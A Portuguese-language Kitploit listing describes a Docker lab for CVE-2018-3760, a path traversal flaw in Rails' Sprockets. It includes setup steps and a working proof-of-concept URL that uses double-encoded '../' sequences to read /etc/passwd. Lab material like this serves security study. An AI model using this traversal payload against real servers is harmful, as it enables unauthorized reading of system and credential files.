Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760- | Kitploit
Ferramentas/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebAprendizado e EducaçãoLabs e Prática
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
31há 6 anosAinda não revisado

Vulnerabilidade de Path Traversal no Ruby On Rails(CVE-2018-3760)

中文版本(Chinese version)

Ruby On Rails é um conhecido framework de desenvolvimento Web em Ruby, que usa Sprockets como servidor de arquivos estáticos no ambiente de desenvolvimento. Sprockets é uma biblioteca Ruby que compila e distribui arquivos de recursos estáticos.

Existe uma vulnerabilidade de path traversal causada por decodificação secundária no Sprockets 3.7.1 e versões anteriores. Um atacante pode usar %252e%252e/ para acessar o diretório raiz e ler ou executar qualquer arquivo no servidor alvo.

Links de referência:

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

Configuração do ambiente

Execute o seguinte comando:

root@kitploit:~
docker-compose up -d

Acesse http://your-ip:3000 e você verá a página de boas-vindas.

POC

Ao acessar http://your-ip:3000/assets/file:%2f%2f/etc/passwd diretamente, um erro será exibido, pois o arquivo /etc/passwd não está no diretório permitido.

Podemos obter uma lista dos diretórios permitidos pela página de erro. Basta selecionar um deles, como /usr/src/blog/app/assets/images, e então usar %252e%252e/ para pular para o diretório pai e, finalmente, ler o arquivo /etc/passwd:

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

Baixar ferramenta